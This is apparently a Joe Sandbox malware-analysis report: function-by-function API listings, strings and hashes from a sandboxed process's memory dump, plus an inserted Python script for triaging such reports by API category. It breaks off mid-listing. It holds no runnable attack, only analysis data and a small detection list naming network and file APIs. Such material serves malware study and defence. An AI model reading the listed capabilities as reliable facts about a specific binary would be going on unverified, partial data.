                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: 00e737a86ef3255bfa1b63a1f16acaf8cc602b40cff4eb1941ea3f5293785b09
                                                                      • Instruction ID: 80a5222020c3133c1601a7292bfcd3f0dcbdb77f9abc480eb8e0bcba8ff9a4d1
                                                                      • Opcode Fuzzy Hash: 00e737a86ef3255bfa1b63a1f16acaf8cc602b40cff4eb1941ea3f5293785b09
                                                                      • Instruction Fuzzy Hash: 4D218D71500305ABDB209F69DC44BDE7BA5AF46724F304A19F8B1E62E0D7B09AD0EF24
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00C105C6
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C10601
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandlePipe
                                                                      • String ID: nul
                                                                      • API String ID: 1424370930-2873401336
                                                                      • Opcode ID: e86bf891cc2fbb7b903a70398f282b77fa131878860eb4785c3b231910bc6ed6
                                                                      • Instruction ID: d7539e10c1fd4fdf51b144be98a7c6b429aba0e8b2936a8e3195187c000a1c45
                                                                      • Opcode Fuzzy Hash: e86bf891cc2fbb7b903a70398f282b77fa131878860eb4785c3b231910bc6ed6
                                                                      • Instruction Fuzzy Hash: 7E216D755002059BDB209F698844ADAB7A4AF96721F300A19FCB1E72E0D7F099E1EB20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA600E: CreateWindowExW.USER32 ref: 00BA604C
                                                                        • Part of subcall function 00BA600E: GetStockObject.GDI32(00000011), ref: 00BA6060
                                                                        • Part of subcall function 00BA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BA606A
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C34112
                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C3411F
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C3412A
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C34139
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C34145
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      • Opcode ID: 21143cdfa200dde0b6ac16cd40e83e45187e1c37a54340424064f473734ee2cf
                                                                      • Instruction ID: 5ae09410ef85ca364b13b2fcf030644da3ab5280a34847754e05563a19f9407a
                                                                      • Opcode Fuzzy Hash: 21143cdfa200dde0b6ac16cd40e83e45187e1c37a54340424064f473734ee2cf
                                                                      • Instruction Fuzzy Hash: F31186B21502197EEF219F64CC86EEB7F6DEF09798F014111FA18A6150C6729C61DBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BDD7A3: _free.LIBCMT ref: 00BDD7CC
                                                                      • _free.LIBCMT ref: 00BDD82D
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      • _free.LIBCMT ref: 00BDD838
                                                                      • _free.LIBCMT ref: 00BDD843
                                                                      • _free.LIBCMT ref: 00BDD897
                                                                      • _free.LIBCMT ref: 00BDD8A2
                                                                      • _free.LIBCMT ref: 00BDD8AD
                                                                      • _free.LIBCMT ref: 00BDD8B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                                      • Instruction ID: 7926a27bced7d7195f17d718900636a4fcc0fe919417e64c5f9b7be8ba976f39
                                                                      • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                                      • Instruction Fuzzy Hash: 30115E71540B44AAD621BFB0CC47FCBFBDCAF10700F4008A6B2DDA6392EA69B9059664
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
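The blocks above are the Joe Sandbox IDA plugin's per-function summaries for the AutoIt-style runtime dumped from process 3 at 0x00BA0000: each one lists the Win32 APIs the function (and, marked "Part of subcall function", its callees) reaches, any string xrefs, and the Similarity identifiers (API ID, String ID, API String ID, Opcode ID, fuzzy hashes). A report of this length is triaged by script, not by eye. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses blocks in this layout into records, tags the functions that touch sockets or move/delete files, and collapses functions that share an API String ID, as the two StringFromGUID2 functions above do (both carry 3761583154-0 at different addresses). SAMPLE is a constructed excerpt copied from the listings above and deliberately cut off mid-block, as the page is; the CATEGORIES buckets are this example's own choice, not a vetted detection list.

```python
import re
from collections import namedtuple

# Constructed excerpt in the report's layout, copied from the listings above; the last block
# is left without its 'Uniqueness Score' line, as the page itself is cut off mid-block.
SAMPLE = r"""
APIs
  • Part of subcall function 00C2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C21112
• closesocket.WSOCK32(00000000), ref: 00C211F9
Similarity
• API String ID: 2675159561-0
Uniqueness Score: -1.00%
APIs
• lstrcmpiW.KERNEL32(?,?), ref: 00C0CF45
• MoveFileW.KERNEL32 ref: 00C0CF7F
• SHFileOperationW.SHELL32(?), ref: 00C0D061
Similarity
• String ID: \*.*
• API String ID: 3164238972-1173974218
Uniqueness Score: -1.00%
APIs
• StringFromGUID2.OLE32(?,?,00000028), ref: 00C077DE
Similarity
• API String ID: 3761583154-0
Uniqueness Score: -1.00%
APIs
• StringFromGUID2.OLE32(?,?,00000028), ref: 00C078AF
Similarity
• API String ID: 3761583154-0
Uniqueness Score: -1.00%
APIs
• MessageBoxW.USER32 ref: 00C0DADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00C0DAB9
"""

ApiCall = namedtuple("ApiCall", "name module args ref from_subcall")  # from_subcall: 'Part of subcall function' line
FunctionSummary = namedtuple("FunctionSummary", "apis strings fields")  # [ApiCall], [(text, xref)], Similarity key -> value

API_RE = re.compile(r"^•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?(?P<name>\w+)\."
                    r"(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*(?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}

def parse_summaries(text: str) -> list:
    # One FunctionSummary per 'APIs' ... 'Uniqueness Score' block; a block cut off by the
    # next 'APIs' header or by end of input is still returned.
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            if cur is not None:
                blocks.append(cur)
            cur, section = FunctionSummary([], [], {}), "APIs"
        elif cur is None:
            continue
        elif line in SECTIONS:
            section = line
        elif line.startswith("Uniqueness Score"):
            blocks.append(cur)
            cur = None
        elif section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"] is not None))
        elif section == "Strings" and (m := STRING_RE.match(line)):
            cur.strings.append((m["text"], m["ref"]))
        elif section == "Similarity" and (m := FIELD_RE.match(line)):
            cur.fields[m["key"]] = m["val"].strip()
    if cur is not None:
        blocks.append(cur)
    return blocks

# Hypothetical triage buckets for this example, built from exports seen in the listings above.
CATEGORIES = {
    "network": {"WSOCK32", "WS2_32", "WININET", "WINHTTP"},
    "file-ops": {"MoveFileW", "SHFileOperationW", "DeleteFileW", "CopyFileW"},
    "child-process-stdio": {"CreatePipe", "CreateProcessW"},
}

def classify(block: FunctionSummary) -> list:
    # Sorted bucket names hit by any call in the block, helper subcalls included.
    return sorted({tag for c in block.apis for tag, names in CATEGORIES.items()
                   if c.module in names or c.name in names})

def triage(text: str) -> list:
    # One row per distinct API String ID: functions sharing an ID have the same API/string
    # profile, so the report's per-address duplicates collapse. Rows without an ID are kept.
    rows, seen = [], set()
    for b in parse_summaries(text):
        key = b.fields.get("API String ID", "")
        if key and key in seen:
            continue
        seen.add(key)
        rows.append({"api_string_id": key, "tags": classify(b),
                     "apis": [c.name for c in b.apis if not c.from_subcall],
                     "string_id": b.fields.get("String ID", ""), "strings": [t for t, _ in b.strings]})
    return rows
```

To run it over the whole report, save the function-summary section as text and call `triage(open(path, encoding="utf-8").read())`; on SAMPLE it yields four rows (the socket function tagged network, the MoveFileW/SHFileOperationW function tagged file-ops with String ID `\*.*`, one row for the pair of StringFromGUID2 functions, and the MessageBoxW function with its format string), the second StringFromGUID2 copy having been folded into the first. Subcall lines are kept in the records and counted for tagging, since a function that reaches inet_addr through a helper is still a networking function, but they are left out of the per-row `apis` list so the row reflects what the function itself calls.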

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C0DA74
                                                                      • LoadStringW.USER32(00000000), ref: 00C0DA7B
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C0DA91
                                                                      • LoadStringW.USER32(00000000), ref: 00C0DA98
                                                                      • MessageBoxW.USER32 ref: 00C0DADC
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00C0DAB9
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 4072794657-3128320259
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(00EAA3A0,00EAA3A0), ref: 00C1097B
                                                                      • EnterCriticalSection.KERNEL32(00EAA380,00000000), ref: 00C1098D
                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00C1099B
                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00C109A9
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C109B8
                                                                      • InterlockedExchange.KERNEL32(00EAA3A0,000001F6), ref: 00C109C8
                                                                      • LeaveCriticalSection.KERNEL32(00EAA380), ref: 00C109CF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __allrem.LIBCMT ref: 00BD00BA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD00D6
                                                                      • __allrem.LIBCMT ref: 00BD00ED
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD010B
                                                                      • __allrem.LIBCMT ref: 00BD0122
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD0140
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1992179935-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                        • Part of subcall function 00C2C998: CharUpperBuffW.USER32(?,?), ref: 00C2C9B5
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2C9F1
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA68
                                                                        • Part of subcall function 00C2C998: _wcslen.LIBCMT ref: 00C2CA9E
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C2BCCA
                                                                      • RegOpenKeyExW.ADVAPI32 ref: 00C2BD25
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00C2BD6A
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C2BD99
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2BDF3
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00C2BDFF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                      • String ID:
                                                                      • API String ID: 1120388591-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000035), ref: 00BFF7B9
                                                                      • SysAllocString.OLEAUT32(00000001), ref: 00BFF860
                                                                      • VariantCopy.OLEAUT32(00BFFA64,00000000), ref: 00BFF889
                                                                      • VariantClear.OLEAUT32(00BFFA64), ref: 00BFF8AD
                                                                      • VariantCopy.OLEAUT32(00BFFA64,00000000), ref: 00BFF8B1
                                                                      • VariantClear.OLEAUT32(?), ref: 00BFF8BB
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                      • String ID:
                                                                      • API String ID: 3859894641-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA7620: _wcslen.LIBCMT ref: 00BA7625
                                                                        • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00C194E5
                                                                      • _wcslen.LIBCMT ref: 00C19506
                                                                      • _wcslen.LIBCMT ref: 00C1952D
                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00C19585
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                      • String ID: X
                                                                      • API String ID: 83654149-3081909835
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                                      • BeginPaint.USER32(?,?), ref: 00BB9241
                                                                      • GetWindowRect.USER32(?,?), ref: 00BB92A5
                                                                      • ScreenToClient.USER32(?,?), ref: 00BB92C2
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BB92D3
                                                                      • EndPaint.USER32(?,?), ref: 00BB9321
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00BF71EA
                                                                        • Part of subcall function 00BB9339: BeginPath.GDI32(00000000), ref: 00BB9357
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 3050599898-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C1080C
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C10847
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00C10863
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00C108DC
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C108F3
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C10921
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3368777196-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C3824C
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00C38272
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00C382D1
                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00C382E5
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00C3830B
                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00C3832F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: 7d4b484fed8d06b5fa86b997dfa868e05670ab6a02be23357be72fc67dd27e36
                                                                      • Instruction ID: d7510663e788f0d3c88ae2393322e976ebb54aaae22ee91d713718eacd5de308
                                                                      • Opcode Fuzzy Hash: 7d4b484fed8d06b5fa86b997dfa868e05670ab6a02be23357be72fc67dd27e36
                                                                      • Instruction Fuzzy Hash: C7419474611744AFDF11CF15CC99BE97BE0BB0A714F184169FA185B272CB32A949CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00C04C95
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C04CB2
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C04CEA
                                                                      • _wcslen.LIBCMT ref: 00C04D08
                                                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00C04D10
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C04D1A
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 72514467-0
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                                      • _wcslen.LIBCMT ref: 00C1587B
                                                                      • CoInitialize.OLE32(00000000), ref: 00C15995
                                                                      • CoCreateInstance.OLE32(00C3FCF8,00000000,00000001,00C3FB68,?), ref: 00C159AE
                                                                      • CoUninitialize.OLE32 ref: 00C159CC
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 3172280962-24824748
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C00FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C00FCA
                                                                        • Part of subcall function 00C00FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C00FD6
                                                                        • Part of subcall function 00C00FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C00FE5
                                                                        • Part of subcall function 00C00FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C00FEC
                                                                        • Part of subcall function 00C00FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C01002
                                                                      • GetLengthSid.ADVAPI32(?,00000000,00C01335), ref: 00C017AE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C017BA
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C017C1
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C017DA
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00C01335), ref: 00C017EE
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C017F5
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C014FF
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00C01506
                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C01515
                                                                      • CloseHandle.KERNEL32(00000004), ref: 00C01520
                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C0154F
                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C01563
                                                                      Similarity
                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                      • String ID:
                                                                      • API String ID: 1413079979-0
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00BC3379,00BC2FE5), ref: 00BC3390
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BC339E
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC33B7
                                                                      • SetLastError.KERNEL32(00000000,?,00BC3379,00BC2FE5), ref: 00BC3409
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,00BD5686,00BE3CD6,?,00000000,?,00BD5B6A,?,?,?,?,?,00BCE6D1,?,00C68A48), ref: 00BD2D78
                                                                      • _free.LIBCMT ref: 00BD2DAB
                                                                      • _free.LIBCMT ref: 00BD2DD3
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DE0
                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DEC
                                                                      • _abort.LIBCMT ref: 00BD2DF2
                                                                      Similarity
                                                                      • API ID: ErrorLast$_free$_abort
                                                                      • String ID:
                                                                      • API String ID: 3160817290-0
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00BB9693
                                                                        • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96A2
                                                                        • Part of subcall function 00BB9639: BeginPath.GDI32(?), ref: 00BB96B9
                                                                        • Part of subcall function 00BB9639: SelectObject.GDI32(?,00000000), ref: 00BB96E2
                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00C38A4E
                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00C38A62
                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00C38A70
                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00C38A80
                                                                      • EndPath.GDI32(?), ref: 00C38A90
                                                                      • StrokePath.GDI32(?), ref: 00C38AA0
                                                                      Similarity
                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                      • String ID:
                                                                      • API String ID: 43455801-0
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00C05218
                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C05229
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C05230
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00C05238
                                                                      • MulDiv.KERNEL32 ref: 00C0524F
                                                                      • MulDiv.KERNEL32 ref: 00C05261
                                                                      Similarity
                                                                      • API ID: CapsDevice$Release
                                                                      • String ID:
                                                                      • API String ID: 1035833867-0
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA1BF4
                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA1BFC
                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA1C07
                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA1C12
                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA1C1A
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA1C22
                                                                      Memory Dump Source
